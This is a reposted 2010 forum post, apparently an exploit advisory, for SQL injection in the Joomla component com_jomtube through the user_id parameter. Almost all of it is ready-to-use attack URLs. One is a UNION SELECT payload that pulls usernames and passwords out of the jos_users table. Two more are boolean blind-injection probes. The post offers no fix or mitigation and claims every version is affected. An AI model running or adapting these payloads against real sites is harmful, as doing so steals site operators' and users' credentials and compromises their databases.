-
-
[转帖]Joomla Component com_jomtube (user_id) Blind SQL Injection / SQL Injection
-
发表于: 2010-7-22 18:25 2190
-
[转帖]Joomla Component com_jomtube (user_id) Blind SQL Injection / SQL Injection
2010-7-22 18:25
2190
--------------------------------------------------------------------------- [Sofware afected info] Joomla Component (com_jomtube) [Download] http://www.jomtube.com/ [Afected versions] All versions + 0 day --------------------------------------------------------------------------- [Exploting..Bug..Demo..] [insert valid user_id=n] http://example/index.php?view=videos&type=member&user_id=-62+union+select+1,2,3,4,5,6,7,8,9 ,10,11,12,group_concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27+fr om+jos_users--&option=com_jomtube [Blind SQL Injection] http://example/index.php?view=videos&type=member&user_id=62+and+1=1--&option=com_jomtube http://example/index.php?view=videos&type=member&user_id=62+and+1=0--&option=com_jomtube ---------------------------------------------------------------------------
赞赏
他的文章
看原图
赞赏
雪币:
留言: